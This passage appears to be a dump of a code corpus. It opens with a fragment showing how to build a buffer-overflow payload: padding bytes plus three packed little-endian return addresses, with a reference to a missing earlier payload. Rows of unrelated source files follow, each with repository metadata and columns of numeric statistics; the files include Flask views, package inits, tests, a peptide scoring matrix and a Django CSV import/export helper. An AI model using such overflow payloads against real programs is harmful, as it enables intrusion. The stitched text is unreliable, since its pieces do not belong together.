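The three 4-byte suffixes in the payload above are memory addresses written byte-by-byte in little-endian order; `struct.pack` expresses the same bytes more readably. The integer values below are read directly off the escape sequences above — what those addresses actually point at in the target binary is not stated in the original file.

```python
import struct

# Pack each 32-bit address little-endian; the bytes match the
# hand-written escape sequences in the payload above.
addr1 = struct.pack("<I", 0xF7E42940)   # -> b"\x40\x29\xe4\xf7"
addr2 = struct.pack("<I", 0xF7E367B0)   # -> b"\xb0\x67\xe3\xf7"
addr3 = struct.pack("<I", 0xF7F6102B)   # -> b"\x2b\x10\xf6\xf7"

payload = b"A" * 76 + addr1 + addr2 + addr3
```

Packing from integers also makes it obvious when an address changes: edit one hex constant instead of reversing bytes by hand.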
| 21 | 74 | 0.547619 | 17 | 84 | 2.705882 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.253521 | 0.154762 | 84 | 3 | 75 | 28 | 0.394366 | 0 | 0 | 0 | 0 | 0 | 0.590361 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
565d1e5e1c141c954054353557aeaf84f7666c49 | 140 | py | Python | webapp/main/views.py | eude313/pitch | fc7dec88ff6c3dbe7d08287dead6fd9d4eb7f785 | [
"MIT"
] | null | null | null | webapp/main/views.py | eude313/pitch | fc7dec88ff6c3dbe7d08287dead6fd9d4eb7f785 | [
"MIT"
] | null | null | null | webapp/main/views.py | eude313/pitch | fc7dec88ff6c3dbe7d08287dead6fd9d4eb7f785 | [
"MIT"
] | null | null | null | from . import main
from flask import render_template
# landing page
@main.route('/')
def home():
return render_template('index.html')
| 15.555556 | 40 | 0.721429 | 19 | 140 | 5.210526 | 0.736842 | 0.282828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.157143 | 140 | 8 | 41 | 17.5 | 0.838983 | 0.085714 | 0 | 0 | 0 | 0 | 0.088 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 6 |
5676d89039606acc19eab955a5740e6bbdd4e532 | 265 | py | Python | reward/batcher/__init__.py | lgvaz/torchrl | cfff8acaf70d1fec72169162b95ab5ad3547d17a | [
"MIT"
] | 5 | 2018-06-21T14:33:40.000Z | 2018-08-18T02:26:03.000Z | reward/batcher/__init__.py | lgvaz/reward | cfff8acaf70d1fec72169162b95ab5ad3547d17a | [
"MIT"
] | null | null | null | reward/batcher/__init__.py | lgvaz/reward | cfff8acaf70d1fec72169162b95ab5ad3547d17a | [
"MIT"
] | 2 | 2018-05-08T03:34:49.000Z | 2018-06-22T15:04:17.000Z | from .base_batcher import BaseBatcher
from .rollout_batcher import RolloutBatcher
from .replay_batcher import ReplayBatcher
from .prioritized_replay_batcher import PrReplayBatcher
from .demo_replay_batcher import DemoReplayBatcher
import reward.batcher.transforms
| 33.125 | 55 | 0.886792 | 31 | 265 | 7.354839 | 0.483871 | 0.285088 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086792 | 265 | 7 | 56 | 37.857143 | 0.942149 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3b24dd51019898c02180822ff9f623866d5b207e | 25 | py | Python | Camera-Node/main.py | thearyadev/Security-System | f9fa48196eef4dc83a9059e10e3c97e2f0842b8d | [
"MIT"
] | 1 | 2022-02-26T21:43:19.000Z | 2022-02-26T21:43:19.000Z | Camera-Node/main.py | thearyadev/Security-System | f9fa48196eef4dc83a9059e10e3c97e2f0842b8d | [
"MIT"
] | null | null | null | Camera-Node/main.py | thearyadev/Security-System | f9fa48196eef4dc83a9059e10e3c97e2f0842b8d | [
"MIT"
] | null | null | null | from utils import Camera
| 12.5 | 24 | 0.84 | 4 | 25 | 5.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3b5771f237adc11d33dc88f220736794c9c4b286 | 319 | py | Python | tests/test_get_stats.py | jeremiahfallin/roleML | 47539f2be594347e64339a0fcc42fececc9db298 | [
"MIT"
] | 55 | 2019-03-19T03:57:06.000Z | 2021-11-21T01:40:24.000Z | tests/test_get_stats.py | jeremiahfallin/roleML | 47539f2be594347e64339a0fcc42fececc9db298 | [
"MIT"
] | 19 | 2019-03-12T03:49:19.000Z | 2021-10-04T18:48:57.000Z | tests/test_get_stats.py | RiftNemesis/roleML | 78fcda9459339d764c92c584fb59e61e09c3c5a9 | [
"MIT"
] | 19 | 2019-03-13T04:40:08.000Z | 2021-09-27T13:16:52.000Z | from roleml.features import _get_stats_at_10
def test_get_stats_na(clean_game_na):
assert clean_game_na["stats_at_10"] == _get_stats_at_10(clean_game_na["game"]["timeline"])
def test_get_stats_euw(clean_game_euw):
assert clean_game_euw["stats_at_10"] == _get_stats_at_10(clean_game_euw["game"]["timeline"])
| 31.9 | 96 | 0.789969 | 56 | 319 | 3.892857 | 0.285714 | 0.247706 | 0.206422 | 0.165138 | 0.275229 | 0.275229 | 0.275229 | 0.275229 | 0.275229 | 0 | 0 | 0.034364 | 0.087774 | 319 | 9 | 97 | 35.444444 | 0.714777 | 0 | 0 | 0 | 0 | 0 | 0.144201 | 0 | 0 | 0 | 0 | 0 | 0.4 | 1 | 0.4 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
8e7212814b34289385934136e01fb6f2e85cd068 | 60 | py | Python | interface/ui/__init__.py | hoefkensj/portal | 90682fc90172d215f0ac3213124dfecacc099581 | [
"Unlicense"
] | null | null | null | interface/ui/__init__.py | hoefkensj/portal | 90682fc90172d215f0ac3213124dfecacc099581 | [
"Unlicense"
] | null | null | null | interface/ui/__init__.py | hoefkensj/portal | 90682fc90172d215f0ac3213124dfecacc099581 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python
from . import cli
from . import cpy
| 10 | 21 | 0.683333 | 10 | 60 | 4.1 | 0.8 | 0.487805 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 60 | 5 | 22 | 12 | 0.854167 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8e933e821dc734be6253b25e92b64001ba026e77 | 2,551 | py | Python | epytope/Data/pssms/smmpmbec/mat/B_53_01_10.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 7 | 2021-02-01T18:11:28.000Z | 2022-01-31T19:14:07.000Z | epytope/Data/pssms/smmpmbec/mat/B_53_01_10.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 22 | 2021-01-02T15:25:23.000Z | 2022-03-14T11:32:53.000Z | epytope/Data/pssms/smmpmbec/mat/B_53_01_10.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 4 | 2021-05-28T08:50:38.000Z | 2022-03-14T11:45:32.000Z | B_53_01_10 = {0: {'A': 0.264, 'C': -0.444, 'E': 0.109, 'D': 0.329, 'G': 0.102, 'F': -0.991, 'I': -0.163, 'H': -0.304, 'K': 0.557, 'M': -0.463, 'L': -0.322, 'N': 0.117, 'Q': 0.481, 'P': 1.036, 'S': 0.256, 'R': 0.223, 'T': 0.208, 'W': -0.2, 'V': 0.044, 'Y': -0.838}, 1: {'A': -0.327, 'C': 0.032, 'E': 0.43, 'D': 0.13, 'G': 0.002, 'F': 0.024, 'I': -0.168, 'H': 0.052, 'K': 0.37, 'M': -0.245, 'L': 0.058, 'N': 0.254, 'Q': 0.294, 'P': -1.203, 'S': -0.021, 'R': 0.206, 'T': 0.134, 'W': 0.049, 'V': -0.43, 'Y': 0.36}, 2: {'A': -0.007, 'C': -0.005, 'E': -0.035, 'D': 0.02, 'G': 0.013, 'F': -0.055, 'I': -0.174, 'H': 0.088, 'K': 0.187, 'M': -0.161, 'L': -0.087, 'N': 0.066, 'Q': -0.002, 'P': 0.053, 'S': 0.098, 'R': 0.133, 'T': 0.052, 'W': -0.049, 'V': -0.111, 'Y': -0.023}, 3: {'A': 0.042, 'C': -0.053, 'E': -0.039, 'D': -0.035, 'G': -0.043, 'F': -0.056, 'I': -0.015, 'H': 0.045, 'K': 0.116, 'M': -0.023, 'L': 0.0, 'N': -0.01, 'Q': 0.004, 'P': 0.015, 'S': 0.01, 'R': 0.12, 'T': 0.005, 'W': -0.059, 'V': 0.004, 'Y': -0.028}, 4: {'A': 0.123, 'C': 0.004, 'E': 0.001, 'D': -0.104, 'G': 0.084, 'F': -0.219, 'I': -0.164, 'H': 0.012, 'K': 0.198, 'M': -0.153, 'L': -0.093, 'N': 0.047, 'Q': 0.139, 'P': 0.139, 'S': 0.076, 'R': 0.255, 'T': 0.002, 'W': -0.166, 'V': -0.02, 'Y': -0.162}, 5: {'A': 0.108, 'C': 0.083, 'E': 0.047, 'D': 0.031, 'G': 0.035, 'F': -0.065, 'I': -0.103, 'H': 0.046, 'K': 0.122, 'M': -0.062, 'L': -0.13, 'N': 0.022, 'Q': -0.032, 'P': -0.102, 'S': 0.054, 'R': 0.14, 'T': -0.059, 'W': -0.002, 'V': -0.06, 'Y': -0.073}, 6: {'A': 0.079, 'C': -0.061, 'E': -0.057, 'D': -0.087, 'G': -0.011, 'F': -0.04, 'I': 0.043, 'H': 0.071, 'K': 0.217, 'M': -0.023, 'L': -0.024, 'N': -0.03, 'Q': -0.016, 'P': 0.052, 'S': 0.001, 'R': 0.211, 'T': -0.074, 'W': -0.131, 'V': -0.008, 'Y': -0.116}, 7: {'A': -0.056, 'C': -0.086, 'E': -0.063, 'D': 0.018, 'G': 0.17, 'F': 0.033, 'I': -0.046, 'H': 0.065, 'K': 0.292, 'M': -0.148, 'L': -0.183, 'N': 0.07, 'Q': 
0.002, 'P': 0.16, 'S': 0.081, 'R': 0.11, 'T': -0.077, 'W': -0.17, 'V': -0.041, 'Y': -0.133}, 8: {'A': 0.207, 'C': -0.009, 'E': -0.004, 'D': 0.101, 'G': 0.067, 'F': -0.08, 'I': -0.101, 'H': -0.02, 'K': 0.201, 'M': -0.092, 'L': -0.177, 'N': -0.148, 'Q': -0.087, 'P': 0.03, 'S': 0.069, 'R': 0.231, 'T': 0.023, 'W': -0.102, 'V': -0.018, 'Y': -0.091}, 9: {'A': 0.587, 'C': -0.484, 'E': 0.356, 'D': 0.471, 'G': 0.078, 'F': -0.861, 'I': -0.424, 'H': -0.112, 'K': 0.227, 'M': -0.246, 'L': -0.135, 'N': 0.043, 'Q': 0.124, 'P': 0.923, 'S': 0.266, 'R': 0.38, 'T': 0.282, 'W': -1.46, 'V': 0.383, 'Y': -0.399}, -1: {'con': 4.5361}} | 2,551 | 2,551 | 0.392003 | 618 | 2,551 | 1.613269 | 0.304207 | 0.02006 | 0.01003 | 0.012036 | 0.042126 | 0 | 0 | 0 | 0 | 0 | 0 | 0.371081 | 0.162289 | 2,551 | 1 | 2,551 | 2,551 | 0.095461 | 0 | 0 | 0 | 0 | 0 | 0.079545 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8ef2068fe56c6948a0b65c3b7863738bba790c30 | 16,910 | py | Python | seshat/seshat/functools.py | XecusM/SESHAT | 34cf989e99e11f645339ce7190d92ff816062243 | [
"MIT"
] | null | null | null | seshat/seshat/functools.py | XecusM/SESHAT | 34cf989e99e11f645339ce7190d92ff816062243 | [
"MIT"
] | null | null | null | seshat/seshat/functools.py | XecusM/SESHAT | 34cf989e99e11f645339ce7190d92ff816062243 | [
"MIT"
] | null | null | null | from django.conf import settings
from django.apps import apps
import numpy as np
import pandas as pd
import os
import json
# Helper functions
def export_module(model_data):
'''
Function to export data
'''
if not os.path.exists(settings.EXPORT_DIR):
if not os.path.exists(settings.VAR_DIR):
os.makedirs(settings.VAR_DIR)
os.makedirs(settings.EXPORT_DIR)
model = apps.get_model(model_data['app_name'], model_data['model_name'])
if model_data['app_name'] == 'stock' and model_data['model_name'] == 'Item':
file_name = 'items.csv'
if os.path.isfile(os.path.join(settings.RESTORE_DIR, file_name)):
os.remove(os.path.join(settings.RESTORE_DIR, file_name))
data = pd.DataFrame.from_records(
model.objects.filter(
is_assembly=False).values_list(
'code', 'desciption', 'barcode', 'stock_limit',
'category__name', 'price',
'location__location__name', 'location__name',
'note', 'is_active',),
columns=(
'code', 'desciption', 'barcode',
'stock_limit', 'category', 'price',
'location', 'sub_location',
'note', 'is_active')
)
data = data.set_index('code')
data.to_csv(
os.path.join(settings.EXPORT_DIR, file_name),
encoding='utf-8')
return {
'message': 'items',
            'path': os.path.join(settings.EXPORT_DIR, file_name),
'file_name': file_name
}
elif model_data['app_name'] == 'stock' and model_data['model_name'] == 'Category':
file_name = 'categories.csv'
if os.path.isfile(os.path.join(settings.RESTORE_DIR, file_name)):
os.remove(os.path.join(settings.RESTORE_DIR, file_name))
data = pd.DataFrame.from_records(
model.objects.all(
).values_list('id', 'name'),
columns=('id', 'name')
)
data = data.set_index('id')
data.to_csv(
os.path.join(settings.EXPORT_DIR, file_name),
encoding='utf-8')
return {
'message': 'categories',
            'path': os.path.join(settings.EXPORT_DIR, file_name),
'file_name': file_name
}
elif model_data['app_name'] == 'stock' and model_data['model_name'] == 'SubLocation':
file_name = 'locations.csv'
if os.path.isfile(os.path.join(settings.RESTORE_DIR, file_name)):
os.remove(os.path.join(settings.RESTORE_DIR, file_name))
data = pd.DataFrame.from_records(
model.objects.all(
).values_list(
'id', 'location__name', 'name'),
columns=(
'id', 'location', 'sub_location')
)
data = data.set_index('id')
data.to_csv(
os.path.join(settings.EXPORT_DIR, file_name),
encoding='utf-8')
return {
'message': 'locations',
            'path': os.path.join(settings.EXPORT_DIR, file_name),
'file_name': file_name
}
elif model_data['app_name'] == 'customer' and model_data['model_name'] == 'Customer':
file_name = 'customers.csv'
if os.path.isfile(os.path.join(settings.RESTORE_DIR, file_name)):
os.remove(os.path.join(settings.RESTORE_DIR, file_name))
data = pd.DataFrame.from_records(
model.objects.all(
).values_list(
'id', 'company__name',
'first_name', 'last_name',
'email', 'phone', 'department',
'job', 'note'),
            columns=(
                'id', 'company',
                'first_name', 'last_name',
                'email', 'phone', 'department',
                'job', 'note')
)
data = data.set_index('id')
data.to_csv(
os.path.join(settings.EXPORT_DIR, file_name),
encoding='utf-8')
return {
'message': 'customers',
            'path': os.path.join(settings.EXPORT_DIR, file_name),
'file_name': file_name
}
elif model_data['app_name'] == 'customer' and model_data['model_name'] == 'CustomerCompany':
file_name = 'customers_companies.csv'
if os.path.isfile(os.path.join(settings.RESTORE_DIR, file_name)):
os.remove(os.path.join(settings.RESTORE_DIR, file_name))
data = pd.DataFrame.from_records(
model.objects.all(
).values_list(
'name', 'desciption',
'phone', 'website',
'taxs_code', 'note'),
columns=(
'name', 'desciption',
'phone', 'website',
'taxs_code', 'note')
)
data = data.set_index('name')
data.to_csv(
os.path.join(settings.EXPORT_DIR, file_name),
encoding='utf-8')
return {
'message': "customers' companies",
            'path': os.path.join(settings.EXPORT_DIR, file_name),
'file_name': file_name
}
elif model_data['app_name'] == 'vendor' and model_data['model_name'] == 'Vendor':
file_name = 'vendors.csv'
if os.path.isfile(os.path.join(settings.RESTORE_DIR, file_name)):
os.remove(os.path.join(settings.RESTORE_DIR, file_name))
data = pd.DataFrame.from_records(
model.objects.all(
).values_list(
'id', 'company__name',
'first_name', 'last_name',
'email', 'phone', 'department',
'job', 'note'),
            columns=(
                'id', 'company',
                'first_name', 'last_name',
                'email', 'phone', 'department',
                'job', 'note')
)
data = data.set_index('id')
data.to_csv(
os.path.join(settings.EXPORT_DIR, file_name),
encoding='utf-8')
return {
'message': 'vendors',
            'path': os.path.join(settings.EXPORT_DIR, file_name),
'file_name': file_name
}
elif model_data['app_name'] == 'vendor' and model_data['model_name'] == 'VendorCompany':
file_name = 'vendors_companies.csv'
if os.path.isfile(os.path.join(settings.RESTORE_DIR, file_name)):
os.remove(os.path.join(settings.RESTORE_DIR, file_name))
data = pd.DataFrame.from_records(
model.objects.all(
).values_list(
'name', 'desciption',
'phone', 'website',
'taxs_code', 'note'),
columns=(
'name', 'desciption',
'phone', 'website',
'taxs_code', 'note')
)
data = data.set_index('name')
data.to_csv(
os.path.join(settings.EXPORT_DIR, file_name),
encoding='utf-8')
return {
'message': "vendors' companies",
            'path': os.path.join(settings.EXPORT_DIR, file_name),
'file_name': file_name
}
else:
return 'error'
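`export_module` repeats the same branch eight times, varying only the model, file name, field list, and message. A table-driven lookup removes that duplication; the sketch below uses plain dictionaries (no Django or pandas), and the `EXPORT_SPECS`/`get_export_spec` names are illustrative assumptions, not part of the original module.

```python
# Hypothetical refactor: map (app_name, model_name) keys to export specs,
# so one code path can replace the repeated if/elif branches above.
EXPORT_SPECS = {
    ('stock', 'Category'): {
        'file_name': 'categories.csv',
        'fields': ('id', 'name'),
        'columns': ('id', 'name'),
        'message': 'categories',
    },
    ('stock', 'SubLocation'): {
        'file_name': 'locations.csv',
        'fields': ('id', 'location__name', 'name'),
        'columns': ('id', 'location', 'sub_location'),
        'message': 'locations',
    },
}


def get_export_spec(app_name, model_name):
    """Return the export spec for a model, or None for the 'error' path."""
    return EXPORT_SPECS.get((app_name, model_name))
```

With the table in place, the body of `export_module` shrinks to one `values_list(*spec['fields'])` / `to_csv` sequence, and adding a new exportable model means adding one dictionary entry rather than a new branch.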
def import_module(model_data, file_name, request_user):
'''
Function to import data
'''
if not os.path.exists(settings.IMPORT_DIR):
if not os.path.exists(settings.VAR_DIR):
os.makedirs(settings.VAR_DIR)
os.makedirs(settings.IMPORT_DIR)
model = apps.get_model(model_data['app_name'], model_data['model_name'])
objects = list()
data = pd.read_csv(os.path.join(settings.IMPORT_DIR, file_name))
if model_data['app_name'] == 'stock' and model_data['model_name'] == 'Item':
for i in list(data.index.values):
if not model.objects.filter(code=pd_handeler(data.loc[i, 'code'])).exists():
category_model = apps.get_model(
model_data['app_name'], 'Category')
category = category_model.objects.get_or_create(
name=data.loc[i, 'category'])
location_model = apps.get_model(
model_data['app_name'], 'Location')
location = location_model.objects.get_or_create(
name=data.loc[i, 'location'])
sub_location_model = apps.get_model(
model_data['app_name'], 'SubLocation')
sub_location = sub_location_model.objects.get_or_create(
location=location[0],
name=data.loc[i, 'sub_location'])
object = model(
code=pd_handeler(data.loc[i, 'code']),
desciption=pd_handeler(data.loc[i, 'desciption']),
barcode=pd_handeler(data.loc[i, 'barcode']),
stock_limit=pd_handeler(data.loc[i, 'stock_limit']),
category=category[0],
price=pd_handeler(data.loc[i, 'price']),
location=sub_location[0],
note=pd_handeler(data.loc[i, 'note']),
is_active=pd_handeler(data.loc[i, 'is_active']),
created_by=request_user
)
objects.append(object)
message = f"({len(objects)}) items"
elif model_data['app_name'] == 'stock' and model_data['model_name'] == 'Category':
for i in list(data.index.values):
if not model.objects.filter(name=pd_handeler(data.loc[i, 'name'])).exists():
object = model(
name=pd_handeler(data.loc[i, 'name']),
created_by=request_user
)
objects.append(object)
message = f"({len(objects)}) categories"
elif model_data['app_name'] == 'stock' and model_data['model_name'] == 'SubLocation':
for i in list(data.index.values):
if not model.objects.filter(name=pd_handeler(data.loc[i, 'sub_location'])).exists():
location_model = apps.get_model(
model_data['app_name'], 'Location')
location = location_model.objects.get_or_create(
name=pd_handeler(data.loc[i, 'location']))
object = model(
location=location[0],
name=pd_handeler(data.loc[i, 'sub_location']),
created_by=request_user
)
objects.append(object)
message = f"({len(objects)}) locations"
elif model_data['app_name'] == 'customer' and model_data['model_name'] == 'Customer':
for i in list(data.index.values):
company_model = apps.get_model(
model_data['app_name'], 'CustomerCompany')
company = company_model.objects.get_or_create(
name=pd_handeler(data.loc[i, 'company']))
            object = model(
                company=company[0],
                first_name=pd_handeler(data.loc[i, 'first_name']),
                last_name=pd_handeler(data.loc[i, 'last_name']),
                email=pd_handeler(data.loc[i, 'email']),
                phone=pd_handeler(data.loc[i, 'phone']),
                department=pd_handeler(data.loc[i, 'department']),
                job=pd_handeler(data.loc[i, 'job']),
                note=pd_handeler(data.loc[i, 'note']),
                created_by=request_user
            )
objects.append(object)
message = f"({len(objects)}) customers"
elif model_data['app_name'] == 'customer' and model_data['model_name'] == 'CustomerCompany':
for i in list(data.index.values):
if not model.objects.filter(name=pd_handeler(data.loc[i, 'name'])).exists():
object = model(
name=pd_handeler(data.loc[i, 'name']),
desciption=pd_handeler(data.loc[i, 'desciption']),
phone=pd_handeler(data.loc[i, 'phone']),
website=pd_handeler(data.loc[i, 'website']),
taxs_code=pd_handeler(data.loc[i, 'taxs_code']),
note=pd_handeler(data.loc[i, 'note']),
created_by=request_user
)
objects.append(object)
message = f"({len(objects)}) customers' companies"
elif model_data['app_name'] == 'vendor' and model_data['model_name'] == 'Vendor':
for i in list(data.index.values):
company_model = apps.get_model(
model_data['app_name'], 'VendorCompany')
company = company_model.objects.get_or_create(
name=pd_handeler(data.loc[i, 'company']))
            object = model(
                company=company[0],
                first_name=pd_handeler(data.loc[i, 'first_name']),
                last_name=pd_handeler(data.loc[i, 'last_name']),
                email=pd_handeler(data.loc[i, 'email']),
                phone=pd_handeler(data.loc[i, 'phone']),
                department=pd_handeler(data.loc[i, 'department']),
                job=pd_handeler(data.loc[i, 'job']),
                note=pd_handeler(data.loc[i, 'note']),
                created_by=request_user
            )
objects.append(object)
message = f"({len(objects)}) vendors"
elif model_data['app_name'] == 'vendor' and model_data['model_name'] == 'VendorCompany':
for i in list(data.index.values):
if not model.objects.filter(name=pd_handeler(data.loc[i, 'name'])).exists():
object = model(
name=pd_handeler(data.loc[i, 'name']),
desciption=pd_handeler(data.loc[i, 'desciption']),
phone=pd_handeler(data.loc[i, 'phone']),
website=pd_handeler(data.loc[i, 'website']),
taxs_code=pd_handeler(data.loc[i, 'taxs_code']),
note=pd_handeler(data.loc[i, 'note']),
created_by=request_user
)
objects.append(object)
message = f"({len(objects)}) vendors' companies"
else:
return 'error'
try:
model.objects.bulk_create(objects)
return {
'message': message,
'file_name': file_name
}
except Exception as error_type:
print(error_type)
return 'error'
def pd_handeler(value):
    '''
    Handle dataframe values before saving them to the database
    '''
    if pd.isna(value):
        return None
    else:
        return value
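The helper above exists because pandas marks empty CSV cells with NaN, a float that compares unequal to everything, including itself, so a plain `value == np.nan` test never matches. A stdlib-only sketch of the same idea; `to_db_value` is an illustrative name, not part of the original module.

```python
import math


def to_db_value(value):
    # NaN is the only float that is not equal to itself, so this
    # self-comparison detects it without importing numpy or pandas.
    if isinstance(value, float) and value != value:
        return None
    return value
```

`pd.isna` does the same check (plus `None` and `NaT` handling) and is the usual choice when pandas is already a dependency.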
| 47.903683 | 97 | 0.457895 | 1,609 | 16,910 | 4.595401 | 0.07831 | 0.057344 | 0.047606 | 0.094266 | 0.838382 | 0.823235 | 0.808493 | 0.784961 | 0.774547 | 0.763186 | 0 | 0.001341 | 0.426907 | 16,910 | 352 | 98 | 48.039773 | 0.761635 | 0.007037 | 0 | 0.677116 | 0 | 0 | 0.131764 | 0.004148 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009404 | false | 0 | 0.031348 | 0 | 0.081505 | 0.003135 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d92460c17622d3c81fed9ffb78649c9a05c2ac38 | 36 | py | Python | compare_date_range/__init__.py | mattwalshdev/compare_date_range | 57c78f4362e7b5f07e6708dd4d39c144bb9447a8 | [
"MIT"
] | null | null | null | compare_date_range/__init__.py | mattwalshdev/compare_date_range | 57c78f4362e7b5f07e6708dd4d39c144bb9447a8 | [
"MIT"
] | null | null | null | compare_date_range/__init__.py | mattwalshdev/compare_date_range | 57c78f4362e7b5f07e6708dd4d39c144bb9447a8 | [
"MIT"
] | null | null | null | from .main import compare_date_range | 36 | 36 | 0.888889 | 6 | 36 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 36 | 1 | 36 | 36 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d961c7f21582181bd9aef789900aa2f3314dcf3f | 87 | py | Python | app/config/context.py | Zadigo/startup_nation | 109d5dbc44422468d3931725e72f4bf7db0c4c49 | [
"MIT"
] | null | null | null | app/config/context.py | Zadigo/startup_nation | 109d5dbc44422468d3931725e72f4bf7db0c4c49 | [
"MIT"
] | null | null | null | app/config/context.py | Zadigo/startup_nation | 109d5dbc44422468d3931725e72f4bf7db0c4c49 | [
"MIT"
] | null | null | null | def context_processor(func):
def context(request):
pass
return context
| 17.4 | 28 | 0.666667 | 10 | 87 | 5.7 | 0.7 | 0.350877 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.264368 | 87 | 4 | 29 | 21.75 | 0.890625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0.25 | 0 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
d964bc6505f66488c8ce182adad8624fd86a898a | 185 | py | Python | src/django-nonrel/tests/regressiontests/formwizard/urls.py | adamjmcgrath/glancydesign | 826ede7c639879d5b79ee730eb5e91422768cb02 | [
"BSD-3-Clause"
] | 790 | 2015-01-03T02:13:39.000Z | 2020-05-10T19:53:57.000Z | tests/regressiontests/formwizard/urls.py | mradziej/django | 5d38965743a369981c9a738a298f467f854a2919 | [
"BSD-3-Clause"
] | 1,361 | 2015-01-08T23:09:40.000Z | 2020-04-14T00:03:04.000Z | tests/regressiontests/formwizard/urls.py | mradziej/django | 5d38965743a369981c9a738a298f467f854a2919 | [
"BSD-3-Clause"
] | 155 | 2015-01-08T22:59:31.000Z | 2020-04-08T08:01:53.000Z | from django.conf.urls.defaults import *
from forms import ContactWizard, Page1, Page2, Page3
urlpatterns = patterns('',
url(r'^wiz/$', ContactWizard([Page1, Page2, Page3])),
)
